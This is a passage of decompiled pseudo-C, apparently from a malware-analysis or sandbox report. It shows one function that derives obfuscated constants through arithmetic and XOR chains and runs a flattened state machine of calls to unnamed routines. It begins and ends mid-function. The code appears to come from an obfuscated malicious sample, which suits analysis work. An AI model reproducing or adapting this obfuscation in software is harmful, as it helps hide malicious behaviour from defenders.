                                                                                                                                                                                      				signed int _v408;
                                                                                                                                                                                      				signed int _v412;
                                                                                                                                                                                      				signed int _v416;
                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                      				void* _t802;
                                                                                                                                                                                      				void* _t804;
                                                                                                                                                                                      				void* _t806;
                                                                                                                                                                                      				void* _t813;
                                                                                                                                                                                      				void* _t815;
                                                                                                                                                                                      				void* _t824;
                                                                                                                                                                                      				void* _t825;
                                                                                                                                                                                      				void* _t826;
                                                                                                                                                                                      				void* _t834;
                                                                                                                                                                                      				signed int _t840;
                                                                                                                                                                                      				signed int _t841;
                                                                                                                                                                                      				signed int _t842;
                                                                                                                                                                                      				signed int _t843;
                                                                                                                                                                                      				signed int _t844;
                                                                                                                                                                                      				signed int _t845;
                                                                                                                                                                                      				signed int _t846;
                                                                                                                                                                                      				signed int _t847;
                                                                                                                                                                                      				signed int _t848;
                                                                                                                                                                                      				signed int _t849;
                                                                                                                                                                                      				signed int _t850;
                                                                                                                                                                                      				signed int _t851;
                                                                                                                                                                                      				signed int _t852;
                                                                                                                                                                                      				signed int _t853;
                                                                                                                                                                                      				signed int _t854;
                                                                                                                                                                                      				signed int _t855;
                                                                                                                                                                                      				signed int _t856;
                                                                                                                                                                                      				signed int _t857;
                                                                                                                                                                                      				signed int _t858;
                                                                                                                                                                                      				signed int _t859;
                                                                                                                                                                                      				signed int _t860;
                                                                                                                                                                                      				signed int _t861;
                                                                                                                                                                                      				void* _t862;
                                                                                                                                                                                      				char _t876;
                                                                                                                                                                                      				void* _t895;
                                                                                                                                                                                      				void* _t970;
                                                                                                                                                                                      				signed int _t973;
                                                                                                                                                                                      				void* _t974;
                                                                                                                                                                                      				signed int _t976;
                                                                                                                                                                                      				void* _t977;
                                                                                                                                                                                      				void* _t981;
                                                                                                                                                                                      				signed int* _t982;
                                                                                                                                                                                      				void* _t985;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t982 =  &_v420;
                                                                                                                                                                                      				_v92 = 0x21aaea;
                                                                                                                                                                                      				_v96 = __ecx;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_t840 = 0x27;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_t981 = 0;
                                                                                                                                                                                      				_t834 = 0x28b91dd;
                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                      				_v276 = 0xea4201;
                                                                                                                                                                                      				_v276 = _v276 / _t840;
                                                                                                                                                                                      				_v276 = _v276 >> 9;
                                                                                                                                                                                      				_v276 = _v276 ^ 0x00000300;
                                                                                                                                                                                      				_v216 = 0x33fbfd;
                                                                                                                                                                                      				_v216 = _v216 + 0xffff15bd;
                                                                                                                                                                                      				_v216 = _v216 ^ 0x003311ba;
                                                                                                                                                                                      				_v348 = 0x23ac56;
                                                                                                                                                                                      				_t841 = 7;
                                                                                                                                                                                      				_v348 = _v348 * 0x70;
                                                                                                                                                                                      				_v348 = _v348 >> 0xa;
                                                                                                                                                                                      				_v348 = _v348 << 5;
                                                                                                                                                                                      				_v348 = _v348 ^ 0x007cdb20;
                                                                                                                                                                                      				_v152 = 0xc392ed;
                                                                                                                                                                                      				_v152 = _v152 | 0x3cac8e62;
                                                                                                                                                                                      				_v152 = _v152 ^ 0x3cef9eef;
                                                                                                                                                                                      				_v120 = 0xdb52e;
                                                                                                                                                                                      				_v120 = _v120 | 0x021edf72;
                                                                                                                                                                                      				_v120 = _v120 ^ 0x021fff7e;
                                                                                                                                                                                      				_v140 = 0x716289;
                                                                                                                                                                                      				_v140 = _v140 / _t841;
                                                                                                                                                                                      				_v140 = _v140 ^ 0x001032a5;
                                                                                                                                                                                      				_v404 = 0x901eee;
                                                                                                                                                                                      				_v404 = _v404 | 0xb1deeda2;
                                                                                                                                                                                      				_v404 = _v404 << 0x10;
                                                                                                                                                                                      				_t842 = 0x18;
                                                                                                                                                                                      				_v404 = _v404 * 0x76;
                                                                                                                                                                                      				_v404 = _v404 ^ 0xf7b40000;
                                                                                                                                                                                      				_v308 = 0x6641fd;
                                                                                                                                                                                      				_v308 = _v308 << 8;
                                                                                                                                                                                      				_v308 = _v308 >> 0xb;
                                                                                                                                                                                      				_v308 = _v308 ^ 0x000cc83f;
                                                                                                                                                                                      				_v220 = 0xec4b39;
                                                                                                                                                                                      				_t65 =  &_v220; // 0xec4b39
                                                                                                                                                                                      				_v220 =  *_t65 * 0x63;
                                                                                                                                                                                      				_v220 = _v220 ^ 0x5b61170b;
                                                                                                                                                                                      				_v336 = 0x6361c6;
                                                                                                                                                                                      				_v336 = _v336 | 0x3c2b95f6;
                                                                                                                                                                                      				_v336 = _v336 << 6;
                                                                                                                                                                                      				_v336 = _v336 ^ 0xaef3ea0d;
                                                                                                                                                                                      				_v336 = _v336 ^ 0xb40e978d;
                                                                                                                                                                                      				_v196 = 0x15a25f;
                                                                                                                                                                                      				_v196 = _v196 * 0x3e;
                                                                                                                                                                                      				_v196 = _v196 ^ 0x053d5302;
                                                                                                                                                                                      				_v244 = 0xaeb8cf;
                                                                                                                                                                                      				_v244 = _v244 ^ 0x8ffcaaa2;
                                                                                                                                                                                      				_v244 = _v244 + 0xffff121b;
                                                                                                                                                                                      				_v244 = _v244 ^ 0x8f512488;
                                                                                                                                                                                      				_v284 = 0x3cdf2a;
                                                                                                                                                                                      				_v284 = _v284 / _t842;
                                                                                                                                                                                      				_t843 = 0x6f;
                                                                                                                                                                                      				_v284 = _v284 / _t843;
                                                                                                                                                                                      				_v284 = _v284 ^ 0x00028d29;
                                                                                                                                                                                      				_v380 = 0xe8bf5b;
                                                                                                                                                                                      				_v380 = _v380 | 0xa79448e5;
                                                                                                                                                                                      				_v380 = _v380 + 0x3298;
                                                                                                                                                                                      				_t844 = 0x61;
                                                                                                                                                                                      				_v380 = _v380 / _t844;
                                                                                                                                                                                      				_v380 = _v380 ^ 0x01b6f871;
                                                                                                                                                                                      				_v164 = 0xa028e3;
                                                                                                                                                                                      				_v164 = _v164 >> 8;
                                                                                                                                                                                      				_v164 = _v164 ^ 0x000bef7a;
                                                                                                                                                                                      				_v144 = 0xaa000b;
                                                                                                                                                                                      				_v144 = _v144 | 0xb15b5655;
                                                                                                                                                                                      				_v144 = _v144 ^ 0xb1f93ed7;
                                                                                                                                                                                      				_v224 = 0x825ce8;
                                                                                                                                                                                      				_v224 = _v224 ^ 0x99839705;
                                                                                                                                                                                      				_v224 = _v224 ^ 0x990bf034;
                                                                                                                                                                                      				_v232 = 0x9a02a1;
                                                                                                                                                                                      				_v232 = _v232 ^ 0x3230df48;
                                                                                                                                                                                      				_v232 = _v232 ^ 0x32abc77a;
                                                                                                                                                                                      				_v372 = 0xe8db0;
                                                                                                                                                                                      				_v372 = _v372 ^ 0xdf502c0f;
                                                                                                                                                                                      				_v372 = _v372 << 4;
                                                                                                                                                                                      				_v372 = _v372 + 0xa166;
                                                                                                                                                                                      				_v372 = _v372 ^ 0xf5e20524;
                                                                                                                                                                                      				_v236 = 0xf17d89;
                                                                                                                                                                                      				_v236 = _v236 << 0xa;
                                                                                                                                                                                      				_v236 = _v236 ^ 0xc5fdd8cb;
                                                                                                                                                                                      				_v192 = 0x124401;
                                                                                                                                                                                      				_v192 = _v192 << 1;
                                                                                                                                                                                      				_v192 = _v192 ^ 0x002403ab;
                                                                                                                                                                                      				_v200 = 0x5fb430;
                                                                                                                                                                                      				_v200 = _v200 ^ 0xc7981bfe;
                                                                                                                                                                                      				_v200 = _v200 ^ 0xc7ca3d42;
                                                                                                                                                                                      				_v208 = 0xc74c13;
                                                                                                                                                                                      				_t845 = 0x57;
                                                                                                                                                                                      				_v208 = _v208 / _t845;
                                                                                                                                                                                      				_v208 = _v208 ^ 0x0006a8aa;
                                                                                                                                                                                      				_v168 = 0x8380fc;
                                                                                                                                                                                      				_v168 = _v168 * 0x53;
                                                                                                                                                                                      				_v168 = _v168 ^ 0x2aae8785;
                                                                                                                                                                                      				_v176 = 0x9ffdb9;
                                                                                                                                                                                      				_v176 = _v176 ^ 0xfc54cce6;
                                                                                                                                                                                      				_v176 = _v176 ^ 0xfccfce01;
                                                                                                                                                                                      				_v184 = 0x3c19aa;
                                                                                                                                                                                      				_v184 = _v184 + 0xffff0dbd;
                                                                                                                                                                                      				_v184 = _v184 ^ 0x003c7cd6;
                                                                                                                                                                                      				_v332 = 0x7ddf6a;
                                                                                                                                                                                      				_v332 = _v332 * 0x48;
                                                                                                                                                                                      				_v332 = _v332 + 0xffffc784;
                                                                                                                                                                                      				_v332 = _v332 >> 2;
                                                                                                                                                                                      				_v332 = _v332 ^ 0x08d6f5e9;
                                                                                                                                                                                      				_v260 = 0x768b26;
                                                                                                                                                                                      				_v260 = _v260 + 0x1ea0;
                                                                                                                                                                                      				_v260 = _v260 >> 0xa;
                                                                                                                                                                                      				_v260 = _v260 ^ 0x00091d68;
                                                                                                                                                                                      				_v340 = 0xf041ab;
                                                                                                                                                                                      				_v340 = _v340 | 0x9a3ffa69;
                                                                                                                                                                                      				_v340 = _v340 * 0x76;
                                                                                                                                                                                      				_v340 = _v340 << 2;
                                                                                                                                                                                      				_v340 = _v340 ^ 0xc7fb4a22;
                                                                                                                                                                                      				_v356 = 0x43b3d6;
                                                                                                                                                                                      				_v356 = _v356 + 0x4b8b;
                                                                                                                                                                                      				_v356 = _v356 + 0xe9f;
                                                                                                                                                                                      				_v356 = _v356 >> 3;
                                                                                                                                                                                      				_v356 = _v356 ^ 0x000654db;
                                                                                                                                                                                      				_v296 = 0x3744a4;
                                                                                                                                                                                      				_v296 = _v296 | 0xb4c0bda8;
                                                                                                                                                                                      				_v296 = _v296 << 0xc;
                                                                                                                                                                                      				_v296 = _v296 ^ 0x7fd1bf6e;
                                                                                                                                                                                      				_v240 = 0xf0a4a1;
                                                                                                                                                                                      				_t846 = 0x35;
                                                                                                                                                                                      				_t973 = 0x29;
                                                                                                                                                                                      				_v240 = _v240 * 0x29;
                                                                                                                                                                                      				_v240 = _v240 ^ 0x268dfba5;
                                                                                                                                                                                      				_v204 = 0x963c75;
                                                                                                                                                                                      				_v204 = _v204 * 0x65;
                                                                                                                                                                                      				_v204 = _v204 ^ 0x3b49a4c9;
                                                                                                                                                                                      				_v248 = 0xe9b3e2;
                                                                                                                                                                                      				_v248 = _v248 + 0xffffcfe1;
                                                                                                                                                                                      				_v248 = _v248 + 0xffff3918;
                                                                                                                                                                                      				_v248 = _v248 ^ 0x00edd730;
                                                                                                                                                                                      				_v320 = 0x14b129;
                                                                                                                                                                                      				_v320 = _v320 | 0x7afa9cce;
                                                                                                                                                                                      				_v320 = _v320 << 6;
                                                                                                                                                                                      				_v320 = _v320 * 0x2c;
                                                                                                                                                                                      				_v320 = _v320 ^ 0xf22961a1;
                                                                                                                                                                                      				_v412 = 0xf4420e;
                                                                                                                                                                                      				_v412 = _v412 * 0x78;
                                                                                                                                                                                      				_v412 = _v412 >> 5;
                                                                                                                                                                                      				_v412 = _v412 + 0x6896;
                                                                                                                                                                                      				_v412 = _v412 ^ 0x039e325f;
                                                                                                                                                                                      				_v420 = 0x97c268;
                                                                                                                                                                                      				_v420 = _v420 >> 7;
                                                                                                                                                                                      				_v420 = _v420 + 0x9a22;
                                                                                                                                                                                      				_v420 = _v420 * 5;
                                                                                                                                                                                      				_v420 = _v420 ^ 0x0006f3f8;
                                                                                                                                                                                      				_v368 = 0xfa90cd;
                                                                                                                                                                                      				_v368 = _v368 >> 3;
                                                                                                                                                                                      				_v368 = _v368 | 0x960f0bdf;
                                                                                                                                                                                      				_v368 = _v368 / _t846;
                                                                                                                                                                                      				_v368 = _v368 ^ 0x02d25408;
                                                                                                                                                                                      				_v344 = 0xc4a2c6;
                                                                                                                                                                                      				_v344 = _v344 / _t973;
                                                                                                                                                                                      				_t847 = 0x6d;
                                                                                                                                                                                      				_v344 = _v344 * 0x41;
                                                                                                                                                                                      				_v344 = _v344 / _t847;
                                                                                                                                                                                      				_v344 = _v344 ^ 0x0000e167;
                                                                                                                                                                                      				_v376 = 0xa5ec95;
                                                                                                                                                                                      				_v376 = _v376 + 0xffff9374;
                                                                                                                                                                                      				_v376 = _v376 + 0x40c1;
                                                                                                                                                                                      				_v376 = _v376 << 5;
                                                                                                                                                                                      				_v376 = _v376 ^ 0x14ba2e6c;
                                                                                                                                                                                      				_v124 = 0xd2fda4;
                                                                                                                                                                                      				_v124 = _v124 + 0xe683;
                                                                                                                                                                                      				_v124 = _v124 ^ 0x00d1ecea;
                                                                                                                                                                                      				_v188 = 0x3a4eac;
                                                                                                                                                                                      				_v188 = _v188 * 0x65;
                                                                                                                                                                                      				_v188 = _v188 ^ 0x170628e3;
                                                                                                                                                                                      				_v132 = 0x698490;
                                                                                                                                                                                      				_v132 = _v132 + 0x597e;
                                                                                                                                                                                      				_v132 = _v132 ^ 0x0066fb45;
                                                                                                                                                                                      				_v292 = 0x223a77;
                                                                                                                                                                                      				_v292 = _v292 << 0xd;
                                                                                                                                                                                      				_v292 = _v292 + 0xffff3c10;
                                                                                                                                                                                      				_v292 = _v292 ^ 0x474a06e9;
                                                                                                                                                                                      				_v180 = 0x302f0e;
                                                                                                                                                                                      				_v180 = _v180 >> 5;
                                                                                                                                                                                      				_v180 = _v180 ^ 0x000a5e5d;
                                                                                                                                                                                      				_v300 = 0xc22ee2;
                                                                                                                                                                                      				_v300 = _v300 << 9;
                                                                                                                                                                                      				_v300 = _v300 ^ 0x161ea530;
                                                                                                                                                                                      				_v300 = _v300 ^ 0x924eaf38;
                                                                                                                                                                                      				_v172 = 0xfb4aa2;
                                                                                                                                                                                      				_t848 = 0x5b;
                                                                                                                                                                                      				_v172 = _v172 / _t848;
                                                                                                                                                                                      				_v172 = _v172 ^ 0x000048eb;
                                                                                                                                                                                      				_v388 = 0x360efc;
                                                                                                                                                                                      				_t849 = 0xa;
                                                                                                                                                                                      				_v388 = _v388 * 0x3a;
                                                                                                                                                                                      				_v388 = _v388 + 0xc1c4;
                                                                                                                                                                                      				_v388 = _v388 + 0x5664;
                                                                                                                                                                                      				_v388 = _v388 ^ 0x0c403f0e;
                                                                                                                                                                                      				_v396 = 0x5476a;
                                                                                                                                                                                      				_v396 = _v396 ^ 0x42600bf2;
                                                                                                                                                                                      				_v396 = _v396 >> 0xe;
                                                                                                                                                                                      				_v396 = _v396 * 0x62;
                                                                                                                                                                                      				_v396 = _v396 ^ 0x00664365;
                                                                                                                                                                                      				_v328 = 0xe3494b;
                                                                                                                                                                                      				_v328 = _v328 + 0x92aa;
                                                                                                                                                                                      				_v328 = _v328 ^ 0x6aed616f;
                                                                                                                                                                                      				_t376 =  &_v328; // 0x6aed616f
                                                                                                                                                                                      				_v328 =  *_t376 / _t849;
                                                                                                                                                                                      				_v328 = _v328 ^ 0x0a9641d7;
                                                                                                                                                                                      				_v268 = 0xcdefc7;
                                                                                                                                                                                      				_v268 = _v268 ^ 0xa3334e4e;
                                                                                                                                                                                      				_t850 = 0x25;
                                                                                                                                                                                      				_v268 = _v268 / _t850;
                                                                                                                                                                                      				_v268 = _v268 ^ 0x04647efb;
                                                                                                                                                                                      				_v400 = 0x131a5;
                                                                                                                                                                                      				_t851 = 0x64;
                                                                                                                                                                                      				_v400 = _v400 * 0x4a;
                                                                                                                                                                                      				_v400 = _v400 ^ 0x0f1274da;
                                                                                                                                                                                      				_v400 = _v400 * 0x22;
                                                                                                                                                                                      				_v400 = _v400 ^ 0x07d5f55f;
                                                                                                                                                                                      				_v360 = 0xe617d1;
                                                                                                                                                                                      				_v360 = _v360 >> 0xd;
                                                                                                                                                                                      				_v360 = _v360 | 0x5174fa74;
                                                                                                                                                                                      				_v360 = _v360 + 0x188;
                                                                                                                                                                                      				_v360 = _v360 ^ 0x517a384b;
                                                                                                                                                                                      				_v128 = 0xe00f23;
                                                                                                                                                                                      				_v128 = _v128 << 0xa;
                                                                                                                                                                                      				_v128 = _v128 ^ 0x8036c474;
                                                                                                                                                                                      				_v408 = 0xcb78c3;
                                                                                                                                                                                      				_v408 = _v408 / _t851;
                                                                                                                                                                                      				_t852 = 0x47;
                                                                                                                                                                                      				_v408 = _v408 / _t852;
                                                                                                                                                                                      				_v408 = _v408 + 0xffff68fe;
                                                                                                                                                                                      				_v408 = _v408 ^ 0xfff44118;
                                                                                                                                                                                      				_v272 = 0xfc5a62;
                                                                                                                                                                                      				_v272 = _v272 * 0x34;
                                                                                                                                                                                      				_v272 = _v272 >> 5;
                                                                                                                                                                                      				_v272 = _v272 ^ 0x019747a7;
                                                                                                                                                                                      				_v156 = 0xfa4dde;
                                                                                                                                                                                      				_v156 = _v156 >> 8;
                                                                                                                                                                                      				_v156 = _v156 ^ 0x000644ae;
                                                                                                                                                                                      				_v304 = 0x2315e0;
                                                                                                                                                                                      				_v304 = _v304 ^ 0x963b0ec5;
                                                                                                                                                                                      				_t853 = 0x11;
                                                                                                                                                                                      				_v304 = _v304 / _t853;
                                                                                                                                                                                      				_v304 = _v304 ^ 0x08dc5d77;
                                                                                                                                                                                      				_v392 = 0x627a1b;
                                                                                                                                                                                      				_t854 = 0x75;
                                                                                                                                                                                      				_v392 = _v392 / _t854;
                                                                                                                                                                                      				_v392 = _v392 << 0xc;
                                                                                                                                                                                      				_t976 = 0x2a;
                                                                                                                                                                                      				_v392 = _v392 / _t976;
                                                                                                                                                                                      				_v392 = _v392 ^ 0x0054cd8e;
                                                                                                                                                                                      				_v148 = 0x2962f6;
                                                                                                                                                                                      				_v148 = _v148 << 0xe;
                                                                                                                                                                                      				_v148 = _v148 ^ 0x58b06ca9;
                                                                                                                                                                                      				_v212 = 0x9d6abd;
                                                                                                                                                                                      				_v212 = _v212 + 0xffff6fa8;
                                                                                                                                                                                      				_v212 = _v212 ^ 0x009f4a76;
                                                                                                                                                                                      				_v416 = 0xfea0f4;
                                                                                                                                                                                      				_t855 = 0x2d;
                                                                                                                                                                                      				_v416 = _v416 / _t855;
                                                                                                                                                                                      				_v416 = _v416 / _t973;
                                                                                                                                                                                      				_v416 = _v416 + 0x55e0;
                                                                                                                                                                                      				_v416 = _v416 ^ 0x0005c112;
                                                                                                                                                                                      				_v228 = 0x3963a4;
                                                                                                                                                                                      				_v228 = _v228 ^ 0x31d128c3;
                                                                                                                                                                                      				_v228 = _v228 ^ 0x31eeea44;
                                                                                                                                                                                      				_v136 = 0x9230b0;
                                                                                                                                                                                      				_v136 = _v136 + 0xffff1ea6;
                                                                                                                                                                                      				_v136 = _v136 ^ 0x00954d5e;
                                                                                                                                                                                      				_v364 = 0x2249f0;
                                                                                                                                                                                      				_v364 = _v364 ^ 0xfb680cc4;
                                                                                                                                                                                      				_v364 = _v364 / _t976;
                                                                                                                                                                                      				_v364 = _v364 << 4;
                                                                                                                                                                                      				_v364 = _v364 ^ 0x5fb5fcae;
                                                                                                                                                                                      				_v160 = 0x56bde9;
                                                                                                                                                                                      				_v160 = _v160 << 0x10;
                                                                                                                                                                                      				_v160 = _v160 ^ 0xbde8ac4a;
                                                                                                                                                                                      				_v312 = 0x1ceb4a;
                                                                                                                                                                                      				_v312 = _v312 | 0x930b0a1e;
                                                                                                                                                                                      				_v312 = _v312 + 0x4259;
                                                                                                                                                                                      				_v312 = _v312 ^ 0x93207f8d;
                                                                                                                                                                                      				_v280 = 0x43d239;
                                                                                                                                                                                      				_v280 = _v280 >> 0xb;
                                                                                                                                                                                      				_v280 = _v280 + 0xffff7066;
                                                                                                                                                                                      				_v280 = _v280 ^ 0xfff11c5c;
                                                                                                                                                                                      				_v264 = 0xa9b19b;
                                                                                                                                                                                      				_v264 = _v264 + 0xffffea48;
                                                                                                                                                                                      				_v264 = _v264 ^ 0xb4acc61c;
                                                                                                                                                                                      				_v264 = _v264 ^ 0xb407c15c;
                                                                                                                                                                                      				_v288 = 0x20bbe8;
                                                                                                                                                                                      				_v288 = _v288 + 0xffffa4f3;
                                                                                                                                                                                      				_v288 = _v288 + 0xeeb1;
                                                                                                                                                                                      				_v288 = _v288 ^ 0x002a2e89;
                                                                                                                                                                                      				_v384 = 0x678812;
                                                                                                                                                                                      				_t856 = 0x60;
                                                                                                                                                                                      				_v384 = _v384 / _t856;
                                                                                                                                                                                      				_v384 = _v384 ^ 0xc458a46c;
                                                                                                                                                                                      				_t974 = 0x4e52e2;
                                                                                                                                                                                      				_t977 = 0x8c2efc;
                                                                                                                                                                                      				_t857 = 0x74;
                                                                                                                                                                                      				_v384 = _v384 / _t857;
                                                                                                                                                                                      				_v384 = _v384 ^ 0x01b63bee;
                                                                                                                                                                                      				_v256 = 0xedc72;
                                                                                                                                                                                      				_t858 = 0x62;
                                                                                                                                                                                      				_v256 = _v256 / _t858;
                                                                                                                                                                                      				_v256 = _v256 >> 0xf;
                                                                                                                                                                                      				_v256 = _v256 ^ 0x000eb51d;
                                                                                                                                                                                      				_v352 = 0x77af38;
                                                                                                                                                                                      				_v352 = _v352 + 0xffff483b;
                                                                                                                                                                                      				_v352 = _v352 + 0xdbd8;
                                                                                                                                                                                      				_v352 = _v352 + 0xffff9e40;
                                                                                                                                                                                      				_v352 = _v352 ^ 0x007a82c2;
                                                                                                                                                                                      				_v316 = 0x34e014;
                                                                                                                                                                                      				_v316 = _v316 >> 0xb;
                                                                                                                                                                                      				_v316 = _v316 + 0xffff226a;
                                                                                                                                                                                      				_v316 = _v316 ^ 0x55756368;
                                                                                                                                                                                      				_v316 = _v316 ^ 0xaa84562e;
                                                                                                                                                                                      				_v324 = 0x2bc11f;
                                                                                                                                                                                      				_v324 = _v324 | 0x52ab72b8;
                                                                                                                                                                                      				_t859 = 0x58;
                                                                                                                                                                                      				_v324 = _v324 / _t859;
                                                                                                                                                                                      				_t860 = 0x5f;
                                                                                                                                                                                      				_v324 = _v324 / _t860;
                                                                                                                                                                                      				_v324 = _v324 ^ 0x00016621;
                                                                                                                                                                                      				_v252 = 0xf022e;
                                                                                                                                                                                      				_v252 = _v252 >> 8;
                                                                                                                                                                                      				_t861 = 0x3b;
                                                                                                                                                                                      				_v252 = _v252 / _t861;
                                                                                                                                                                                      				_v252 = _v252 ^ 0x000f04ac;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					_t802 = 0xd56de6a;
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						L2:
                                                                                                                                                                                      						_t862 = 0x80f0eae;
                                                                                                                                                                                      						do {
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								L3:
                                                                                                                                                                                      								_t985 = _t834 - 0x8ccb677;
                                                                                                                                                                                      								if(_t985 > 0) {
                                                                                                                                                                                      									break;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t985 == 0) {
                                                                                                                                                                                      									E003E8907(_v100, _v280, _v264, _v288);
                                                                                                                                                                                      									_t834 = _t974;
                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                      										L1:
                                                                                                                                                                                      										_t802 = 0xd56de6a;
                                                                                                                                                                                      										L2:
                                                                                                                                                                                      										_t862 = 0x80f0eae;
                                                                                                                                                                                      										goto L3;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t834 == _t974) {
                                                                                                                                                                                      									E003E8907(_v116, _v384, _v256, _v352);
                                                                                                                                                                                      									_t834 = 0xe9f0a5a;
                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                      										L1:
                                                                                                                                                                                      										_t802 = 0xd56de6a;
                                                                                                                                                                                      										goto L2;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t834 == _t977) {
                                                                                                                                                                                      									_t824 = E003EF561(_v104);
                                                                                                                                                                                      									_t834 = 0xac30134;
                                                                                                                                                                                      									__eflags = _t824;
                                                                                                                                                                                      									_t981 =  !=  ? 1 : _t981;
                                                                                                                                                                                      									while(1) {
                                                                                                                                                                                      										L1:
                                                                                                                                                                                      										_t802 = 0xd56de6a;
                                                                                                                                                                                      										goto L2;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t834 == 0x14ed6fb) {
                                                                                                                                                                                      									_t825 = E003E132D(_v116, _v296, _v240, _v120, _v204);
                                                                                                                                                                                      									_t982 =  &(_t982[3]);
                                                                                                                                                                                      									__eflags = _t825 - _v140;
                                                                                                                                                                                      									_t802 = 0xd56de6a;
                                                                                                                                                                                      									_t834 =  ==  ? 0xd56de6a : _t974;
                                                                                                                                                                                      									goto L2;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t834 == 0x15fae28) {
                                                                                                                                                                                      									_t826 = E003F0AD3(_v328, _v268, __eflags);
                                                                                                                                                                                      									_t895 = 0x3d1598;
                                                                                                                                                                                      									__eflags = E003DF7F4(_v400, _t826, _v360,  *_v96,  *((intOrPtr*)(_v96 + 4)), _t895, _v128, _v112,  &_v100, _v408, _v272, _v220, _v156, _v304) - _v336;
                                                                                                                                                                                      									_t834 =  ==  ? 0x80f0eae : _t974;
                                                                                                                                                                                      									E003E2EED(_v392, _v148, _v212, _t826);
                                                                                                                                                                                      									_t982 =  &(_t982[0xe]);
                                                                                                                                                                                      									L14:
                                                                                                                                                                                      									_t977 = 0x8c2efc;
                                                                                                                                                                                      									L35:
                                                                                                                                                                                      									_t862 = 0x80f0eae;
                                                                                                                                                                                      									_t802 = 0xd56de6a;
                                                                                                                                                                                      									goto L36;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t834 == 0x28b91dd) {
                                                                                                                                                                                      									_t834 = 0xbb5c550;
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t834 != _t862) {
                                                                                                                                                                                      									goto L36;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								E003E3927(_v416, _v228, _v136, _v196,  &_v104, _v116, _v100);
                                                                                                                                                                                      								_t982 =  &(_t982[5]);
                                                                                                                                                                                      								_t834 =  ==  ? _t977 : 0x8ccb677;
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									L1:
                                                                                                                                                                                      									_t802 = 0xd56de6a;
                                                                                                                                                                                      									goto L2;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t834 - 0x9b49f28;
                                                                                                                                                                                      							if(_t834 == 0x9b49f28) {
                                                                                                                                                                                      								_v108 = 0x100;
                                                                                                                                                                                      								_t804 = E003E703F(_v332, _v260, _v340, 0x100,  &_v116, _v112, _v348, _v356);
                                                                                                                                                                                      								_t982 =  &(_t982[6]);
                                                                                                                                                                                      								__eflags = _t804 - _v152;
                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                      									_t834 = 0xe9f0a5a;
                                                                                                                                                                                      									goto L35;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t834 = 0x14ed6fb;
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									L1:
                                                                                                                                                                                      									_t802 = 0xd56de6a;
                                                                                                                                                                                      									goto L2;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t834 - 0xac30134;
                                                                                                                                                                                      							if(_t834 == 0xac30134) {
                                                                                                                                                                                      								E003D5FF7(_v364, _v160, _v312, _v104);
                                                                                                                                                                                      								_t834 = 0x8ccb677;
                                                                                                                                                                                      								goto L1;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t834 - 0xbb5c550;
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								_push(0x3d16d8);
                                                                                                                                                                                      								_t806 = E003F0AD3(_v284, _v380, __eflags);
                                                                                                                                                                                      								 *_t982 = 0x3d15c8;
                                                                                                                                                                                      								__eflags = E003D92DD(_t806, _v276, _v224,  &_v112, E003F0AD3(_v164, _v144, __eflags), _v232, _v372, _v236) - _v216;
                                                                                                                                                                                      								_t834 =  ==  ? 0x9b49f28 : 0x911112e;
                                                                                                                                                                                      								E003E2EED(_v192, _v200, _v208, _t806);
                                                                                                                                                                                      								E003E2EED(_v168, _v176, _v184, _t807);
                                                                                                                                                                                      								_t982 =  &(_t982[0xa]);
                                                                                                                                                                                      								_t974 = 0x4e52e2;
                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t834 - _t802;
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								_push(0x3d1598);
                                                                                                                                                                                      								_t813 = E003F0AD3(_v248, _v320, __eflags);
                                                                                                                                                                                      								_t876 = 0x48;
                                                                                                                                                                                      								_t980 = _t813;
                                                                                                                                                                                      								_v108 = _t876;
                                                                                                                                                                                      								_t815 = E003DAD17( &_v108, _v404, _t876, _v412,  &_v76, _v420, _t876, _v116, _v368, _v344, _v376, _t813, _v124, _v188);
                                                                                                                                                                                      								_t982 =  &(_t982[0xc]);
                                                                                                                                                                                      								__eflags = _t815 - _v308;
                                                                                                                                                                                      								if(_t815 != _v308) {
                                                                                                                                                                                      									_t834 = _t974;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_push(_v300);
                                                                                                                                                                                      									_push(_v180);
                                                                                                                                                                                      									_push(_v292);
                                                                                                                                                                                      									_push(_v132);
                                                                                                                                                                                      									_push( *0x3f5be0 + 0x18);
                                                                                                                                                                                      									_t970 = 0x40;
                                                                                                                                                                                      									E003E4626( &_v68, _t970);
                                                                                                                                                                                      									_t982 =  &(_t982[5]);
                                                                                                                                                                                      									_t834 = 0x15fae28;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								E003E2EED(_v172, _v388, _v396, _t980);
                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t834 - 0xe9f0a5a;
                                                                                                                                                                                      							if(_t834 != 0xe9f0a5a) {
                                                                                                                                                                                      								goto L36;
